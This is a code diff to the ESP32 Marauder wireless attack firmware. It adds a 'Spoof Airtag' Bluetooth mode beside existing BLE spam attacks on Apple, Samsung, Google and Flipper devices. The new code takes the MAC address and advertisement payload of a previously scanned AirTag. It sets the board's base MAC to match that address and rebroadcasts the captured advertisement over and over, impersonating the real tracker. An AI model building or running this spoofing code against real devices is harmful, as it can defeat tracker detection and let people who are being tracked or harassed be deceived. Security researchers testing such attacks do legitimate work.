diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index 9beb18d..c610d4a 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp @@ -592,6 +592,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS)) @@ -658,6 +659,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (wifi_scan_obj.currentScanMode == BT_SPOOF_AIRTAG) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) || @@ -1227,6 +1229,7 @@ void MenuFunctions::RunSetup() { extern LinkedList* access_points; extern LinkedList* stations; + extern LinkedList* airtags; this->disable_touch = false; @@ -1265,6 +1268,9 @@ void MenuFunctions::RunSetup() #endif wifiGeneralMenu.list = new LinkedList(); wifiAPMenu.list = new LinkedList(); + #ifdef HAS_BT + airtagMenu.list = new LinkedList(); + #endif #ifndef HAS_ILI9341 wifiStationMenu.list = new LinkedList(); #endif @@ -1323,6 +1329,9 @@ void MenuFunctions::RunSetup() clearSSIDsMenu.name = text_table1[28]; clearAPsMenu.name = text_table1[29]; wifiAPMenu.name = "Access Points"; + #ifdef HAS_BT + airtagMenu.name = "Select Airtag"; + #endif #ifndef HAS_ILI9341 wifiStationMenu.name = "Select Stations"; #endif @@ -1663,6 +1672,7 @@ void MenuFunctions::RunSetup() this->changeMenu(wifiAPMenu.parentMenu); }); + // Select Stations on Mini v1 /* this->addNodes(&wifiGeneralMenu, "Select Stations", TFT_CYAN, NULL, KEYBOARD_ICO, [this](){ @@ -1914,6 +1924,59 @@ void MenuFunctions::RunSetup() wifi_scan_obj.StartScan(BT_ATTACK_SPAM_ALL, TFT_MAGENTA); }); + #ifndef HAS_ILI9341 + // Select Airtag on Mini + this->addNodes(&bluetoothAttackMenu, "Spoof Airtag", TFT_WHITE, NULL, ATTACKS, [this](){ + // Clear nodes and add back button + airtagMenu.list->clear(); + this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { + this->changeMenu(airtagMenu.parentMenu); + }); + + // Add buttons for all airtags + // Find out how big our menu is going to be + int menu_limit; + if (airtags->size() <= BUTTON_ARRAY_LEN) + menu_limit = airtags->size(); + else + menu_limit = BUTTON_ARRAY_LEN; + + Serial.println("Found " + (String)airtags->size() + " airtag(s)"); + + // Create the menu nodes for all of the list items + for (int i = 0; i < menu_limit; i++) { + this->addNodes(&airtagMenu, airtags->get(i).mac, TFT_WHITE, NULL, BLUETOOTH, [this, i](){ + AirTag new_at = airtags->get(i); + new_at.selected = true; + + airtags->set(i, new_at); + + // Set all other airtags to "Not Selected" + for (int x = 0; x < airtags->size(); x++) { + if (x != i) { + AirTag new_atx = airtags->get(x); + new_atx.selected = false; + airtags->set(x, new_atx); + } + } + + // Start the spoof + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_SPOOF_AIRTAG, TFT_WHITE); + + }); + } + this->changeMenu(&airtagMenu); + }); + + airtagMenu.parentMenu = &bluetoothAttackMenu; + this->addNodes(&airtagMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { + this->changeMenu(airtagMenu.parentMenu); + }); + + #endif + // Device menu deviceMenu.parentMenu = &mainMenu; this->addNodes(&deviceMenu, text09, TFT_LIGHTGREY, NULL, 0, [this]() { diff --git a/esp32_marauder/MenuFunctions.h b/esp32_marauder/MenuFunctions.h index 8b016ca..6f6ea8e 100644 --- a/esp32_marauder/MenuFunctions.h +++ b/esp32_marauder/MenuFunctions.h @@ -151,6 +151,9 @@ class MenuFunctions #endif Menu wifiGeneralMenu; Menu wifiAPMenu; + #ifdef HAS_BT + Menu airtagMenu; + #endif #ifndef HAS_ILI9341 Menu wifiStationMenu; #endif diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index 1890681..56a34a0 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -176,6 +176,18 @@ extern "C" { break; } + + case Airtag: { + for (int i = 0; i < airtags->size(); i++) { + if (airtags->get(i).selected) { + AdvData.addData(std::string((char*)airtags->get(i).payload.data(), airtags->get(i).payloadSize)); + + break; + } + } + + break; + } default: { Serial.println("Please Provide a Company Type"); break; @@ -244,6 +256,7 @@ extern "C" { AirTag airtag; airtag.mac = mac; airtag.payload.assign(payLoad, payLoad + len); + airtag.payloadSize = len; airtags->add(airtag); @@ -697,7 +710,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) (scan_mode == BT_ATTACK_SPAM_ALL) || (scan_mode == BT_ATTACK_SAMSUNG_SPAM) || (scan_mode == BT_ATTACK_GOOGLE_SPAM) || - (scan_mode == BT_ATTACK_FLIPPER_SPAM)) { + (scan_mode == BT_ATTACK_FLIPPER_SPAM) || + (scan_mode == BT_SPOOF_AIRTAG)) { #ifdef HAS_BT RunSwiftpairSpam(scan_mode, color); #endif @@ -885,6 +899,7 @@ void WiFiScan::StopScan(uint8_t scan_mode) (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || (currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (currentScanMode == BT_SPOOF_AIRTAG) || (currentScanMode == BT_SCAN_WAR_DRIVE) || (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (currentScanMode == BT_SCAN_SKIMMERS)) @@ -2051,7 +2066,7 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) { // Check for success or handle errors if (err == ESP_OK) { - Serial.println("Base MAC address successfully set."); + return; } else if (err == ESP_ERR_INVALID_ARG) { Serial.println("Error: Invalid MAC address argument."); } else { @@ -2059,6 +2074,46 @@ void WiFiScan::setBaseMacAddress(uint8_t macAddr[6]) { } } +void WiFiScan::executeSpoofAirtag() { + #ifdef HAS_BT + for (int i = 0; i < airtags->size(); i++) { + if (airtags->get(i).selected) { + + uint8_t macAddr[6]; + + convertMacStringToUint8(airtags->get(i).mac, macAddr); + + //macAddr[0] = 0x02; + + macAddr[5] -= 2; + + Serial.println("Using MAC: " + macToString(macAddr)); + + // Do this because ESP32 BT addr is Base MAC + 2 + + this->setBaseMacAddress(macAddr); + + NimBLEDevice::init(""); + + NimBLEServer *pServer = NimBLEDevice::createServer(); + + pAdvertising = pServer->getAdvertising(); + + //NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData(); + NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Airtag); + pAdvertising->setAdvertisementData(advertisementData); + pAdvertising->start(); + delay(10); + pAdvertising->stop(); + + NimBLEDevice::deinit(); + + break; + } + } + #endif +} + void WiFiScan::executeSwiftpairSpam(EBLEPayloadType type) { #ifdef HAS_BT uint8_t macAddr[6]; @@ -2473,6 +2528,8 @@ void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) { display_obj.tft.drawCentreString("BLE Spam Google",120,16,2); else if (scan_mode == BT_ATTACK_FLIPPER_SPAM) display_obj.tft.drawCentreString("BLE Spam Flipper", 120, 16, 2); + else if (scan_mode == BT_SPOOF_AIRTAG) + display_obj.tft.drawCentreString("BLE Spoof Airtag", 120, 16, 2); display_obj.touchToExit(); #endif display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); @@ -4922,7 +4979,8 @@ void WiFiScan::main(uint32_t currentTime) (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || - (currentScanMode == BT_ATTACK_FLIPPER_SPAM)) { + (currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (currentScanMode == BT_SPOOF_AIRTAG)) { #ifdef HAS_BT if (currentTime - initTime >= 1000) { initTime = millis(); @@ -4958,6 +5016,10 @@ void WiFiScan::main(uint32_t currentTime) if ((currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSwiftpairSpam(FlipperZero); + + if (currentScanMode == BT_SPOOF_AIRTAG) + this->executeSpoofAirtag(); + #endif } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 0ecf752..f9b857f 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -96,6 +96,7 @@ #define BT_ATTACK_GOOGLE_SPAM 41 #define BT_ATTACK_FLIPPER_SPAM 42 #define BT_SCAN_AIRTAG 43 +#define BT_SPOOF_AIRTAG 44 #define GRAPH_REFRESH 100 @@ -159,6 +160,7 @@ struct Station { struct AirTag { String mac; // MAC address of the AirTag std::vector payload; // Payload data + uint16_t payloadSize; bool selected; }; @@ -273,7 +275,8 @@ class WiFiScan Apple, Samsung, Google, - FlipperZero + FlipperZero, + Airtag }; #ifdef HAS_BT @@ -302,6 +305,7 @@ class WiFiScan void clearMacHistory(); void executeWarDrive(); void executeSourApple(); + void executeSpoofAirtag(); void executeSwiftpairSpam(EBLEPayloadType type); void startWardriverWiFi(); //void generateRandomMac(uint8_t* mac); diff --git a/esp32_marauder/utils.h b/esp32_marauder/utils.h index b435d12..a9e6ad6 100644 --- a/esp32_marauder/utils.h +++ b/esp32_marauder/utils.h @@ -55,6 +55,14 @@ String macToString(const Station& station) { return String(macStr); } +String macToString(uint8_t macAddr[6]) { + char macStr[18]; // 17 characters for "XX:XX:XX:XX:XX:XX" + 1 null terminator + snprintf(macStr, sizeof(macStr), "%02X:%02X:%02X:%02X:%02X:%02X", + macAddr[0], macAddr[1], macAddr[2], + macAddr[3], macAddr[4], macAddr[5]); + return String(macStr); +} + void convertMacStringToUint8(const String& macStr, uint8_t macAddr[6]) { // Ensure the input string is in the format "XX:XX:XX:XX:XX:XX" if (macStr.length() != 17) {